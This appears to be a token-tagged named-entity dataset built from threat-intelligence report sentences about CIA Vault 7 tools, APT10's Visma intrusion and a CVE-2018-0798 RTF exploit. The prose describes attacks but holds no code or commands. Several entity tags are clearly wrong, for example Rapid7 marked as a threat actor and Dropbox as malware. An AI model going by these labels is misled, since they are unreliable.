+to O
+use O
+. O
+For O
+example O
+, O
+Comodo S-IDTY
+was O
+defeated O
+by O
+CIA S-APT
+malware O
+placing O
+itself O
+in O
+the O
+Window's O
+Recycle O
+Bin O
+. O
+CIA S-SECTEAM
+hackers O
+discussed O
+what O
+the O
+NSA's O
+Equation B-APT
+Group E-APT
+hackers O
+did O
+wrong O
+and O
+how O
+the O
+CIA's O
+malware O
+makers O
+could O
+avoid O
+similar O
+exposure O
+. O
+The O
+CIA's S-APT
+Remote O
+Devices O
+Branch's O
+UMBRAGE S-APT
+group O
+collects O
+and O
+maintains O
+a O
+substantial O
+library O
+of O
+attack O
+techniques O
+'stolen' O
+from O
+malware O
+produced O
+in O
+other O
+states O
+including O
+the O
+Russian S-LOC
+Federation O
+. O
+This O
+information O
+is O
+used O
+by O
+the O
+CIA's S-APT
+'JQJIMPROVISE' S-MAL
+software O
+(see O
+below) O
+to O
+configure O
+a O
+set O
+of O
+CIA O
+malware O
+suited O
+to O
+the O
+specific O
+needs O
+of O
+an O
+operation O
+. O
+Its O
+configuration O
+utilities O
+like O
+Margarita S-FILE
+allows O
+the O
+NOC O
+(Network O
+Operation O
+Center) O
+to O
+customize O
+tools O
+based O
+on O
+requirements O
+from O
+'Fine O
+Dining' O
+questionairies O
+. O
+HIVE S-MAL
+is O
+a O
+multi-platform O
+CIA S-APT
+malware O
+suite O
+and O
+its O
+associated O
+control O
+software O
+. O
+A O
+series O
+of O
+standards O
+lay O
+out O
+CIA S-APT
+malware O
+infestation O
+patterns O
+which O
+are O
+likely O
+to O
+assist O
+forensic O
+crime O
+scene O
+investigators O
+as O
+well O
+as O
+Apple S-IDTY
+, O
+Microsoft S-IDTY
+, O
+Google S-IDTY
+, O
+Samsung S-IDTY
+, O
+Nokia S-IDTY
+, O
+Blackberry S-IDTY
+, O
+Siemens S-IDTY
+and O
+anti-virus B-IDTY
+companies E-IDTY
+attribute O
+and O
+defend O
+against O
+attacks O
+. O
+In O
+April B-TIME
+2013 E-TIME
+, O
+Kaspersky S-SECTEAM
+Lab O
+reported O
+that O
+a O
+popular O
+game O
+was O
+altered O
+to O
+include O
+a O
+backdoor O
+in O
+2011 O
+. O
+Yet O
+again O
+, O
+new O
+supply-chain B-ACT
+attacks E-ACT
+recently O
+caught O
+the O
+attention O
+of O
+ESET S-SECTEAM
+Researchers O
+. O
+Given O
+that O
+these O
+attacks O
+were O
+mostly O
+targeted O
+against O
+Asia S-LOC
+and O
+the O
+gaming B-IDTY
+industry E-IDTY
+, O
+it O
+shouldn’t O
+be O
+surprising O
+they O
+are O
+the O
+work O
+of O
+the O
+group O
+described O
+in O
+Kaspersky’s S-SECTEAM
+Winnti S-APT
+– O
+More O
+than O
+just O
+a O
+game” O
+. O
+The O
+OSB S-MAL
+functions O
+as O
+the O
+interface O
+between O
+CIA S-APT
+operational O
+staff O
+and O
+the O
+relevant O
+technical O
+support O
+staff O
+. O
+A O
+sustained O
+cyberespionage O
+campaign B-ACT
+targeting E-ACT
+at O
+least O
+three O
+companies O
+in O
+the O
+United O
+States O
+and O
+Europe O
+was O
+uncovered O
+by O
+Recorded B-SECTEAM
+Future E-SECTEAM
+and O
+Rapid7 S-SECTEAM
+between O
+November B-TIME
+2017 E-TIME
+and O
+September B-TIME
+2018 E-TIME
+. O
+The O
+Honeycomb S-FILE
+toolserver O
+receives O
+exfiltrated O
+information O
+from O
+the O
+implant; O
+an O
+operator O
+can O
+also O
+task O
+the O
+implant O
+to O
+execute O
+jobs O
+on O
+the O
+target O
+computer O
+, O
+so O
+the O
+toolserver O
+acts O
+as O
+a O
+C2 S-TOOL
+(command O
+and O
+control) O
+server O
+for O
+the O
+implant O
+. O
+The O
+attackers O
+then O
+enumerated O
+access O
+and O
+conducted O
+privilege O
+escalation O
+on O
+the O
+victim O
+networks O
+, O
+utilizing O
+DLL B-ACT
+sideloading E-ACT
+techniques O
+documented O
+in O
+a O
+US-CERT O
+alert O
+on O
+APT10 S-APT
+to O
+deliver O
+malware O
+. O
+On O
+the O
+two O
+other O
+victim O
+networks O
+, O
+the O
+attackers O
+deployed O
+a O
+unique O
+version O
+of O
+the O
+UPPERCUT S-MAL
+(ANEL) O
+backdoor O
+, O
+known O
+to O
+have O
+only O
+been O
+used O
+by O
+APT10 S-APT
+. O
+APT10 S-APT
+actors O
+then O
+compressed O
+proprietary O
+data O
+from O
+Visma O
+using O
+WinRAR S-MAL
+(deployed O
+by O
+the O
+attackers) O
+and O
+exfiltrated O
+to O
+a O
+Dropbox S-TOOL
+account O
+using O
+the O
+cURL S-MAL
+for O
+Windows S-OS
+command-line O
+tool O
+. O
+UMBRAGE S-FILE
+components O
+cover O
+keyloggers O
+, O
+password O
+collection O
+, O
+webcam O
+capture O
+, O
+data O
+destruction O
+, O
+persistence O
+, O
+privilege O
+escalation O
+, O
+stealth O
+, O
+anti-virus O
+(PSP) O
+avoidance O
+and O
+survey O
+techniques O
+. O
+we O
+assess O
+with O
+high O
+confidence O
+that O
+these O
+incidents O
+were O
+conducted O
+by O
+APT10 S-APT
+also O
+known O
+as O
+Stone B-APT
+Panda E-APT
+, O
+menuPass S-APT
+, O
+CVNX S-APT
+in O
+an O
+effort O
+to O
+gain O
+access O
+to O
+networks O
+and O
+steal O
+valuable O
+intellectual O
+property O
+or O
+gain O
+commercial O
+advantage O
+. O
+On O
+top O
+of O
+the O
+breadth O
+, O
+volume O
+, O
+and O
+targets O
+of O
+attacks O
+that O
+APT10 S-APT
+has O
+conducted O
+since O
+at O
+least O
+2016 S-TIME
+, O
+we O
+now O
+know O
+that O
+these O
+operations O
+are O
+being O
+run O
+by O
+the O
+Chinese B-LOC
+intelligence I-LOC
+agency E-LOC
+, O
+the O
+Ministry O
+of O
+State O
+Security O
+(MSS) O
+. O
+Utilizing O
+actors O
+working O
+for O
+shell O
+companies O
+such O
+as O
+Huaying O
+Haitai O
+Science O
+and O
+Technology O
+Development O
+Co O
+Ltd O
+, O
+the O
+MSS S-APT
+has O
+conducted O
+an O
+unprecedented O
+campaign O
+, O
+dubbed O
+Operation O
+Cloud O
+Hopper O
+, O
+” O
+against O
+managed O
+IT O
+service O
+providers O
+(MSPs) O
+designed O
+to O
+steal O
+intellectual O
+property O
+and O
+enable O
+secondary O
+attacks O
+against O
+their O
+clients O
+. O
+We O
+assess O
+that O
+APT10 S-APT
+likely O
+compromised O
+Visma O
+with O
+the O
+primary O
+goal O
+of O
+enabling O
+secondary O
+intrusions O
+onto O
+their O
+client O
+networks O
+, O
+and O
+not O
+of O
+stealing O
+Visma O
+intellectual O
+property O
+. O
+In O
+this O
+same O
+time O
+frame O
+, O
+APT10 S-APT
+also O
+targeted O
+a O
+U.S. B-IDTY
+law I-IDTY
+firm E-IDTY
+and O
+an O
+international O
+apparel B-IDTY
+company E-IDTY
+, O
+likely O
+to O
+gather O
+information O
+for O
+commercial O
+advantage O
+. O
+The O
+backdoor O
+was O
+deployed O
+using O
+the O
+Notepad++ O
+updater O
+and O
+sideloading O
+malicious O
+DLL S-TOOL
+, O
+as O
+noted O
+in O
+APT10’s S-APT
+targeting O
+of O
+Japanese B-IDTY
+corporations E-IDTY
+in O
+July S-TIME
+2018 S-TIME
+. O
+That O
+attack O
+was O
+attributed O
+to O
+perpetrators O
+Kaspersky S-SECTEAM
+called O
+the O
+Winnti B-APT
+Group E-APT
+. O
+APT10 S-APT
+is O
+a O
+threat O
+actor O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2009 S-TIME
+. O
+APT10 S-APT
+has O
+historically O
+targeted O
+healthcare S-IDTY
+, O
+defense S-IDTY
+, O
+aerospace S-IDTY
+, O
+government S-IDTY
+, O
+heavy B-IDTY
+industry E-IDTY
+and O
+mining S-IDTY
+, O
+and O
+MSPs S-IDTY
+and O
+IT B-IDTY
+services E-IDTY
+, O
+as O
+well O
+as O
+other O
+sectors S-IDTY
+, O
+for O
+probable O
+intellectual O
+property O
+theft O
+. O
+We O
+believe O
+APT10 S-APT
+is O
+the O
+most O
+significant O
+Chinese B-LOC
+state-sponsored E-LOC
+cyber O
+threat O
+to O
+global O
+corporations O
+known O
+to O
+date O
+. O
+In O
+the O
+blog O
+, O
+Intrusion O
+Truth O
+identified O
+APT10 S-APT
+as O
+having O
+utilized O
+several O
+Tianjin-based B-IDTY
+companies E-IDTY
+, O
+including O
+Huaying B-IDTY
+Haitai I-IDTY
+Science E-IDTY
+and O
+Technology O
+Development O
+Co. O
+Ltd. O
+and O
+Laoying O
+Baichen O
+Instruments O
+Equipment O
+Co. O
+Ltd O
+. O
+Based O
+on O
+the O
+technical O
+data O
+uncovered O
+, O
+and O
+in O
+light O
+of O
+recent O
+disclosures O
+by O
+the O
+U.S. S-LOC
+Department S-LOC
+of O
+Justice O
+on O
+the O
+ongoing O
+activities O
+of O
+Chinese B-APT
+state-sponsored E-APT
+threat O
+actors O
+. O
+Our O
+research O
+from O
+2017 S-TIME
+concluded O
+that O
+Guangdong B-APT
+ITSEC E-APT
+(and O
+therefore O
+the O
+MSS) O
+directed O
+the O
+activities O
+of O
+a O
+company O
+named O
+Boyusec S-IDTY
+, O
+which O
+was O
+identified O
+as O
+a O
+shell O
+company O
+for O
+APT3 S-APT
+. O
+Access O
+to O
+the O
+networks O
+of O
+these O
+third-party O
+service O
+providers O
+grants O
+the O
+MSS S-APT
+the O
+ability O
+to O
+potentially O
+access O
+the O
+networks O
+of O
+hundreds O
+, O
+if O
+not O
+thousands O
+, O
+of O
+corporations O
+around O
+the O
+world O
+. O
+The O
+December O
+APT10 S-APT
+indictment O
+noted O
+that O
+the O
+group’s O
+malicious O
+activities O
+breached O
+at O
+least O
+45 O
+companies O
+and O
+managed O
+service O
+providers O
+in O
+12 O
+countries O
+, O
+including O
+Brazil S-LOC
+, O
+Canada S-LOC
+, O
+Finland S-LOC
+, O
+France S-LOC
+, O
+Germany S-LOC
+, O
+India S-LOC
+, O
+Japan S-LOC
+, O
+Sweden S-LOC
+, O
+Switzerland O
+, O
+the O
+United B-LOC
+Arab I-LOC
+Emirates E-LOC
+, O
+the B-LOC
+United I-LOC
+Kingdom E-LOC
+, O
+and O
+the B-LOC
+United I-LOC
+States E-LOC
+. O
+In O
+all O
+three O
+incidents O
+, O
+APT10 S-APT
+gained O
+access O
+to O
+networks O
+through O
+deployments O
+of O
+Citrix S-MAL
+and O
+LogMeIn S-MAL
+remote-access O
+software O
+using O
+stolen O
+valid O
+user O
+credentials O
+. O
+In O
+all O
+three O
+incidents O
+, O
+the O
+attackers S-APT
+gained O
+access O
+to O
+networks O
+through O
+deployments O
+of O
+Citrix O
+and O
+LogMeIn O
+remote-access O
+software O
+using O
+stolen S-ACT
+valid O
+user O
+credentials O
+. O
+In O
+all O
+three O
+incidents O
+, O
+APT10 S-APT
+actors O
+used S-ACT
+previously O
+acquired O
+legitimate O
+credentials O
+, O
+possibly O
+gained O
+via O
+a O
+third-party O
+supply O
+chain O
+compromise O
+in O
+order O
+to O
+gain O
+initial O
+access O
+to O
+the O
+law B-IDTY
+firm E-IDTY
+and O
+the O
+apparel B-IDTY
+company E-IDTY
+. O
+In O
+early O
+2017 S-TIME
+, O
+APT10 S-APT
+began O
+conducting O
+attacks O
+against O
+global O
+managed O
+IT B-IDTY
+service E-IDTY
+providers O
+(MSPs) S-IDTY
+that O
+granted O
+them O
+unprecedented O
+access O
+to O
+MSPs O
+and O
+their O
+customers’ O
+networks O
+. O
+'Improvise' S-FILE
+is O
+a O
+toolset O
+for O
+configuration O
+, O
+post-processing O
+, O
+payload O
+setup O
+and O
+execution O
+vector O
+selection O
+for O
+survey/Exfiltration S-ACT
+tools O
+supporting O
+all O
+major O
+operating O
+systems O
+like O
+Windows S-OS
+(Bartender) O
+, O
+MacOS S-OS
+( O
+JukeBox S-TOOL
+) O
+and O
+Linux S-ACT
+( O
+DanceFloor S-TOOL
+) O
+. O
+. O
+During O
+this O
+operation O
+(dubbed O
+‘Cloud O
+Hopper” O
+because O
+of O
+the O
+group’s O
+use O
+of O
+popular O
+western O
+cloud-based O
+services) O
+, O
+APT10 S-APT
+utilized O
+both O
+new O
+malware O
+(Quasar B-MAL
+RAT E-MAL
+, O
+Trochilus S-MAL
+, O
+RedLeaves S-MAL
+, O
+ChChes S-MAL
+as O
+well O
+as O
+some O
+familiar O
+old O
+tools O
+. O
+Most O
+recently O
+, O
+on O
+December B-TIME
+20 E-TIME
+, O
+2018 S-TIME
+, O
+the O
+U.S. B-SECTEAM
+Department E-SECTEAM
+of O
+Justice O
+charged O
+two O
+hackers O
+associated O
+with O
+the O
+Chinese O
+Ministry O
+of O
+State O
+Security O
+(MSS) S-LOC
+with O
+global O
+computer O
+intrusion O
+campaigns O
+targeting O
+intellectual O
+property O
+. O
+This O
+indictment O
+attributed O
+the O
+intrusions O
+to O
+APT10 S-APT
+, O
+a O
+group O
+that O
+had O
+been O
+conducting O
+the O
+malicious O
+activities O
+for O
+over O
+a O
+decade O
+on O
+behalf O
+of O
+the O
+MSS O
+, O
+China’s S-LOC
+civilian O
+human O
+intelligence O
+agency O
+. O
+The O
+Visma S-APT
+group O
+operates O
+across O
+the O
+entire O
+Nordic O
+region O
+along O
+with O
+Benelux S-LOC
+, O
+Central S-LOC
+, O
+and O
+Eastern B-LOC
+Europe E-LOC
+. O
+Recorded B-SECTEAM
+Future E-SECTEAM
+has O
+actively O
+tracked O
+APT10 S-APT
+for O
+several O
+years O
+, O
+focusing O
+specifically O
+on O
+the O
+group’s O
+targeting O
+of O
+MSPs O
+and O
+global O
+internet O
+infrastructure O
+providers O
+since O
+the O
+Operation O
+Cloud O
+Hopper O
+report O
+in O
+2017 O
+. O
+We O
+were O
+particularly O
+interested O
+in O
+identifying O
+whether O
+any O
+customers O
+of O
+the O
+targeted O
+MSPs O
+were O
+subsequently O
+compromised O
+by O
+APT10 S-APT
+, O
+given O
+their O
+potential O
+access O
+through O
+compromised O
+MSP S-IDTY
+networks O
+. O
+Recorded B-SECTEAM
+Future’s E-SECTEAM
+Insikt O
+Group O
+has O
+actively O
+tracked O
+APT10 O
+for O
+several O
+years O
+, O
+focusing O
+specifically O
+on O
+the O
+group’s O
+targeting O
+of O
+MSPs S-IDTY
+and O
+global O
+internet O
+infrastructure B-IDTY
+providers E-IDTY
+since O
+the O
+Operation O
+Cloud O
+Hopper O
+report O
+in O
+2017 S-TIME
+. O
+In O
+September B-TIME
+2018 E-TIME
+, O
+one O
+of O
+our O
+clients O
+(and O
+a O
+supplier O
+as O
+well) O
+, O
+Visma O
+, O
+reached O
+out O
+to O
+us O
+for O
+assistance O
+in O
+investigating O
+an O
+incident O
+uncovered O
+on O
+their O
+network O
+following O
+a O
+breach O
+notification O
+by O
+Rapid7 S-APT
+. O
+This O
+was O
+followed O
+by O
+an O
+initial O
+exploitation O
+, O
+network O
+enumeration O
+, O
+and O
+malicious O
+tool O
+deployment O
+on O
+various O
+Visma B-MAL
+endpoints E-MAL
+within O
+two O
+weeks O
+of O
+initial O
+access O
+. O
+On O
+August B-TIME
+30 E-TIME
+, O
+2018 S-TIME
+, O
+APT10 S-APT
+deployed O
+their O
+first O
+modified O
+version O
+of O
+Trochilus S-MAL
+that O
+had O
+its O
+C2 S-TOOL
+communications O
+encrypted O
+using O
+Salsa20 O
+and O
+RC4 S-ENCR
+ciphers O
+instead O
+of O
+the O
+more O
+common O
+RC4-encrypted S-ENCR
+Trochilus O
+variant O
+seen O
+in O
+the O
+wild O
+. O
+This O
+sample S-FILE
+, O
+similar O
+to O
+other O
+Trochilus S-FILE
+samples O
+, O
+was O
+deployed O
+using O
+a O
+DLL S-TOOL
+sideloading O
+method O
+utilizing O
+three O
+files O
+, O
+uploaded O
+to O
+the O
+same O
+folder O
+on O
+the O
+victim O
+machine O
+as O
+identified O
+in O
+US-CERT O
+advisory O
+TA17-117A O
+last O
+revised O
+on O
+December O
+20 O
+, O
+2018 S-TIME
+. O
+The O
+configuration B-FILE
+file E-FILE
+then O
+loads O
+the O
+Trochilus O
+payload O
+into O
+memory O
+by O
+injecting O
+it O
+into O
+a O
+valid O
+system O
+process O
+. O
+APT10 S-APT
+also O
+used O
+WinRAR S-MAL
+and O
+cURL S-MAL
+for O
+Windows S-OS
+, O
+both O
+often O
+renamed O
+, O
+to O
+compress O
+and O
+upload O
+the O
+exfiltrated O
+files O
+from O
+the O
+Visma O
+network O
+to O
+the O
+Dropbox S-TOOL
+API O
+. O
+In O
+order O
+to O
+exfiltrate O
+the O
+compromised O
+data O
+, O
+APT10 S-APT
+employed O
+custom O
+malware O
+that O
+used O
+Dropbox S-MAL
+as O
+its O
+C2 S-TOOL
+. O
+They O
+also O
+used O
+WinRAR S-TOOL
+and O
+cURL O
+for O
+Windows S-OS
+, O
+both O
+often O
+renamed O
+, O
+to O
+compress O
+and O
+upload O
+the O
+exfiltrated O
+files O
+from O
+the O
+Visma S-MAL
+network O
+to O
+the O
+Dropbox B-MAL
+API E-MAL
+. O
+Our O
+research O
+partner O
+Rapid7 S-SECTEAM
+investigated O
+the O
+Dropbox S-MAL
+use O
+and O
+found O
+that O
+the O
+attackers S-APT
+had O
+used O
+the O
+same O
+account O
+to O
+store O
+exfiltrated O
+data O
+from O
+a O
+global O
+apparel O
+company O
+. O
+They S-SECTEAM
+also O
+identified O
+broadly O
+similar O
+TTPs O
+being O
+used O
+in O
+the O
+attack B-ACT
+against E-ACT
+a O
+U.S. O
+law O
+firm O
+specializing O
+in O
+intellectual O
+property O
+law O
+. O
+Rapid7’s S-SECTEAM
+investigation O
+revealed O
+the O
+law B-IDTY
+firm E-IDTY
+was O
+first O
+targeted O
+in O
+late O
+2017 S-TIME
+, O
+followed O
+by O
+the O
+apparel O
+company O
+a O
+few O
+months O
+later O
+, O
+and O
+finally O
+, O
+the O
+Visma B-ACT
+attack E-ACT
+in O
+August B-TIME
+2018 E-TIME
+. O
+In O
+one O
+of O
+the O
+attacks O
+, O
+Rapid7 S-SECTEAM
+identified O
+the O
+attackers S-APT
+escaping O
+a O
+Citrix S-MAL
+application O
+in O
+order O
+to O
+run O
+the O
+payload O
+script O
+on O
+the O
+victim O
+desktop O
+. O
+Additionally O
+, O
+the O
+same O
+DLL S-TOOL
+sideloading O
+technique O
+observed O
+in O
+the O
+Visma S-MAL
+attack O
+was O
+used O
+, O
+and O
+many O
+of O
+the O
+tools O
+deployed O
+by O
+the O
+APT10 S-APT
+shared O
+naming O
+similarities O
+as O
+well O
+1.bat S-MAL
+, O
+cu.exe S-MAL
+, O
+ss.rar S-MAL
+, O
+r.exe S-MAL
+, O
+pd.exe S-MAL
+. O
+Most O
+interestingly O
+, O
+Rapid7 S-SECTEAM
+observed O
+the O
+use O
+of O
+the O
+Notepad++ O
+updater O
+gup.exe S-FILE
+as O
+a O
+legitimate O
+executable O
+to O
+sideload O
+a O
+malicious O
+DLL S-TOOL
+(libcurl.dll) O
+in O
+order O
+to O
+deploy O
+a O
+variant O
+of O
+the O
+UPPERCUT O
+backdoor O
+also O
+known O
+as O
+ANEL S-FILE
+. O
+APT10 S-APT
+used O
+this O
+approach O
+to O
+deploy O
+UPPERCUT S-MAL
+when O
+targeting O
+Japanese B-IDTY
+corporations E-IDTY
+in O
+July B-TIME
+2018 E-TIME
+. O
+APT10 S-APT
+actors O
+gained O
+initial O
+access O
+to O
+the O
+Visma B-MAL
+network E-MAL
+around O
+August B-TIME
+17 E-TIME
+, O
+2018 S-TIME
+. O
+While O
+we O
+are O
+confident O
+that O
+APT10 S-APT
+actors O
+gained O
+access O
+to O
+the O
+Visma S-IDTY
+network O
+in O
+August O
+using O
+stolen O
+employee O
+Citrix B-MAL
+remote I-MAL
+desktop E-MAL
+credentials O
+, O
+it O
+is O
+not O
+clear O
+how O
+or O
+when O
+these O
+credentials O
+were O
+initially O
+compromised O
+. O
+Insikt B-APT
+Group E-APT
+analysis O
+of O
+network O
+metadata O
+to O
+and O
+from O
+the O
+VPN S-TOOL
+endpoint O
+IPs O
+revealed O
+consistent O
+connectivity O
+to O
+Citrix-hosted S-FILE
+infrastructure O
+from O
+all O
+eight O
+VPN S-TOOL
+endpoint O
+IPs O
+starting O
+on O
+August B-TIME
+17 E-TIME
+, O
+2018 S-TIME
+— O
+the O
+same O
+date O
+the O
+first O
+authenticated O
+login O
+to O
+Visma’s O
+network O
+was O
+made O
+using O
+stolen O
+credentials O
+. O
+After O
+almost O
+two O
+weeks O
+, O
+on O
+August B-TIME
+30 E-TIME
+, O
+2018 S-TIME
+, O
+APT10 S-APT
+attackers O
+used O
+their O
+access O
+to O
+the O
+network O
+to O
+move O
+laterally O
+and O
+made O
+their O
+first O
+deployment O
+of O
+an O
+RC4- O
+and O
+Salsa20-encrypted S-ENCR
+variant O
+of O
+the O
+Trochilus S-MAL
+malware O
+using O
+a O
+previously O
+associated O
+DLL S-TOOL
+sideloading O
+techniquE O
+. O
+This O
+means O
+that O
+APT10 S-APT
+actors O
+had O
+two O
+separate O
+access O
+points O
+into O
+the O
+Visma B-MAL
+network E-MAL
+. O
+This O
+slight O
+delay O
+may O
+point O
+to O
+the O
+handing O
+over O
+of O
+active O
+exploitation O
+duties O
+to O
+other O
+operator(s) O
+in O
+a O
+multi-team O
+APT10 S-APT
+effort O
+within O
+the O
+Ministry S-LOC
+of O
+State O
+Security O
+for O
+the O
+attack O
+. O
+Other O
+examples O
+of O
+malicious O
+infrastructure O
+registered O
+with O
+internet.bs O
+include O
+domains O
+for O
+APT28’s S-APT
+VPNFilter S-MAL
+malware O
+campaign O
+and O
+the O
+registration O
+of O
+the O
+cyber-berkut S-MAL
+. O
+org O
+domain O
+that O
+was O
+affiliated O
+with O
+the O
+pro-Russian S-LOC
+and O
+potentially O
+Russian O
+state-linked O
+threat O
+actor O
+CyberBerkut S-APT
+. O
+KHRAT S-FILE
+is O
+a O
+backdoor B-MAL
+trojan E-MAL
+purported O
+to O
+be O
+used O
+with O
+the O
+China-linked S-LOC
+cyberespionage O
+group O
+DragonOK S-APT
+. O
+In O
+early B-TIME
+2018 E-TIME
+, O
+Rapid7 S-SECTEAM
+identified O
+that O
+APT10 S-APT
+compromised O
+an O
+apparel B-IDTY
+company E-IDTY
+, O
+based O
+upon O
+detections O
+and O
+intelligence O
+gathered O
+from O
+the O
+U.S.-based O
+law B-IDTY
+firm E-IDTY
+breach O
+. O
+The O
+attacker S-APT
+gained O
+access O
+to O
+the O
+victim’s O
+internet-accessible O
+Citrix S-MAL
+systems O
+and O
+authenticated O
+to O
+them O
+from O
+networks O
+associated O
+with O
+low-cost O
+VPN S-TOOL
+providers O
+owned O
+by O
+VPN S-TOOL
+Consumer O
+Network O
+. O
+Rapid7 S-SECTEAM
+again O
+observed O
+APT10 S-APT
+dropping O
+payloads O
+named O
+ccSEUPDT.exe.” O
+The O
+attackers O
+used O
+identical O
+TTPs O
+for O
+executing O
+malware O
+and O
+Mimikatz S-MAL
+as O
+observed O
+before O
+, O
+by O
+using O
+DLL S-TOOL
+sideloading O
+with O
+known O
+good O
+binaries O
+that O
+had O
+DLL S-TOOL
+search O
+order O
+path O
+issues O
+. O
+Rapid7 S-SECTEAM
+reviewed O
+malware O
+discovered O
+in O
+the O
+victim’s O
+environment O
+and O
+found O
+implants O
+that O
+used O
+Dropbox S-FILE
+as O
+the O
+C2 S-TOOL
+. O
+The O
+attackers S-APT
+used O
+the O
+same O
+method O
+of O
+lateral O
+movement O
+by O
+mounting O
+the O
+remote O
+drive O
+on O
+a O
+system O
+, O
+copying O
+1.bat S-MAL
+to O
+it O
+, O
+using O
+task O
+scheduler O
+to O
+execute O
+the O
+batch O
+script O
+, O
+and O
+finally O
+, O
+deleting O
+the O
+batch O
+script O
+. O
+APT10 S-APT
+used O
+the O
+same O
+method O
+of O
+lateral O
+movement O
+by O
+mounting S-ACT
+the O
+remote O
+drive O
+on O
+a O
+system O
+, O
+copying O
+1.bat O
+to O
+it O
+, O
+using O
+task B-ACT
+scheduler E-ACT
+to O
+execute O
+the O
+batch O
+script O
+, O
+and O
+finally O
+, O
+deleting O
+the O
+batch O
+script O
+. O
+For O
+Exfiltration S-ACT
+of O
+stolen O
+data O
+, O
+APT10 S-APT
+used O
+WinRAR S-MAL
+and O
+renamed O
+rar.exe” S-MAL
+to O
+r.exe” S-MAL
+to O
+create O
+archives O
+, O
+upload O
+them O
+with O
+curl.exe” O
+(renamed O
+to O
+c.exe”) O
+, O
+and O
+again O
+, O
+use O
+the O
+cloud O
+storage O
+provider O
+Dropbox S-MAL
+. O
+Rapid7 S-SECTEAM
+discovered O
+that O
+additional O
+data O
+was O
+placed O
+into O
+the O
+Dropbox S-TOOL
+accounts O
+under O
+control O
+of O
+the O
+attacker S-APT
+during O
+the O
+compromise O
+and O
+was O
+able O
+to O
+attribute B-ACT
+data E-ACT
+that O
+was O
+placed O
+into O
+it O
+as O
+being O
+owned O
+by O
+Visma O
+. O
+Once O
+on O
+the O
+Visma B-MAL
+network E-MAL
+, O
+APT10 S-APT
+attackers O
+used O
+the O
+Microsoft S-IDTY
+BITSAdmin S-MAL
+CLI O
+tool O
+to O
+copy O
+malicious O
+tools O
+from O
+a O
+suspected O
+attacker-controlled O
+C2 S-TOOL
+hosted O
+on O
+173.254.236[.]158 O
+to O
+the O
+\ProgramData\temp\ O
+directory O
+on O
+the O
+infected O
+host O
+. O
+Rapid7 S-SECTEAM
+then O
+provided O
+a O
+breach O
+notification O
+to O
+Visma O
+to O
+alert O
+them O
+to O
+this O
+compromise O
+in O
+September S-TIME
+2018 S-TIME
+. O
+We O
+believe O
+APT10 S-APT
+is O
+the O
+most O
+significant O
+known O
+Chinese S-LOC
+state-sponsored O
+cyber O
+threat O
+to O
+global O
+corporations O
+. O
+APT10's S-APT
+unprecedented O
+campaign O
+against O
+MSPs S-IDTY
+, O
+alleged O
+to O
+have O
+included O
+some O
+of O
+the O
+largest O
+MSPs O
+in O
+the O
+world O
+, O
+in O
+order O
+to O
+conduct O
+secondary O
+attacks O
+against O
+their O
+clients O
+, O
+grants O
+the O
+Chinese O
+state O
+the O
+ability O
+to O
+potentially O
+access O
+the O
+networks O
+of O
+hundreds O
+(if O
+not O
+thousands) O
+of O
+corporations O
+around O
+the O
+world O
+. O
+This O
+campaign O
+brings O
+to O
+light O
+further O
+evidence O
+supporting O
+the O
+assertions O
+made O
+by O
+the O
+Five O
+Eyes O
+nations O
+, O
+led O
+by O
+the O
+U.S. O
+Department O
+of O
+Justice O
+indictment O
+against O
+APT10 S-APT
+actors O
+outlining O
+the O
+unprecedented O
+scale O
+of O
+economic S-IDTY
+cyberespionage O
+being O
+conducted O
+by O
+the O
+Chinese O
+Ministry O
+of O
+State O
+Security O
+. O
+This O
+report O
+, O
+alongside O
+the O
+plethora O
+of O
+other O
+reporting O
+on O
+APT10 S-APT
+operations O
+, O
+acutely O
+highlights S-ACT
+the O
+vulnerability O
+of O
+organizational O
+supply O
+chains O
+. O
+
+The O
+analyzed O
+RTF O
+files O
+share O
+the O
+same O
+object O
+dimension O
+(objw2180\objh300) O
+used O
+to O
+track O
+the O
+RTF O
+weaponizer O
+in O
+our O
+previous O
+report O
+, O
+however O
+, O
+the O
+sample S-FILE
+was O
+not O
+exploiting O
+CVE-2017-11882 S-VULID
+or O
+CVE-2018-0802 S-VULID
+. O
+After O
+further O
+analysis O
+, O
+it O
+was O
+discovered O
+that O
+the O
+RTF B-FILE
+files E-FILE
+were O
+exploiting O
+the O
+CVE-2018-0798 S-VULID
+vulnerability O
+in O
+Microsoft S-IDTY
+’s O
+Equation B-TOOL
+Editor E-TOOL
+( O
+EQNEDT32 S-TOOL
+) O
+. O
+
+Anomali S-SECTEAM
+Researchers O
+were O
+able O
+to O
+identify O
+multiple O
+samples O
+of O
+malicious O
+RTF O
+documents O
+ITW S-FILE
+using O
+the O
+same O
+exploit S-VULNAME
+for O
+CVE-2018-0798 S-VULID
+. O
+The O
+earliest O
+use O
+of O
+the O
+exploit S-VULNAME
+ITW S-FILE
+we O
+were O
+able O
+to O
+identify O
+and O
+confirm O
+is O
+a O
+sample O
+e228045ef57fb8cc1226b62ada7eee9b S-MD5
+dating O
+back O
+to O
+October B-TIME
+2018 E-TIME
+( O
+VirusTotal S-TOOL
+submission O
+of O
+2018-10-29 S-TIME
+) O
+with O
+the O
+RTF S-TOOL
+creation O
+time O
+2018-10-23 S-TIME
+. O
+
+CVE-2018-0798 S-VULID
+is O
+an O
+RCE O
+vulnerability O
+, O
+a O
+stack O
+buffer O
+overflow O
+that O
+can O
+be O
+exploited O
+by O
+a O
+threat O
+actor O
+to O
+perform O
+stack O
+corruption O
+. O
+As O
+observed O
+previously O
+with O
+CVE-2017-11882 S-VULID
+and O
+CVE-2018-0802 S-VULID
+, O
+the O
+weaponizer S-MAL
+was O
+used O
+exclusively O
+by O
+Chinese O
+Cyber B-ACT
+Espionage E-ACT
+actors S-APT
+for O
+approximately O
+one O
+year O
+December B-TIME
+2017 E-TIME
+through O
+December B-TIME
+2018 E-TIME
+, O
+after O
+which O
+cybercrime O
+actors O
+began O
+to O
+incorporate O
+it O
+in O
+their O
+malicious O
+activity O
+. O
+Upon O
+decrypting O
+and O
+executing O
+, O
+it O
+drops O
+two O
+additional O
+files O
+wsc_proxy.exe” S-FILE
+(legitimate O
+Avast O
+executable) O
+and O
+a O
+malicious O
+DLL S-TOOL
+wsc.dll” S-FILE
+in O
+the O
+%TEMP% O
+folder O
+. O
+However O
+, O
+Beginning O
+on O
+25 O
+June O
+2019 O
+, O
+we O
+started O
+observing O
+multiple O
+commodity O
+campaigns O
+Mostly O
+dropping O
+AsyncRAT S-FILE
+using O
+the O
+updated O
+RTF O
+weaponizer O
+with O
+the O
+same O
+exploit S-VULNAME
+( O
+CVE-2018-0798 S-VULID
+) O
+. O
+Analysis O
+of O
+the O
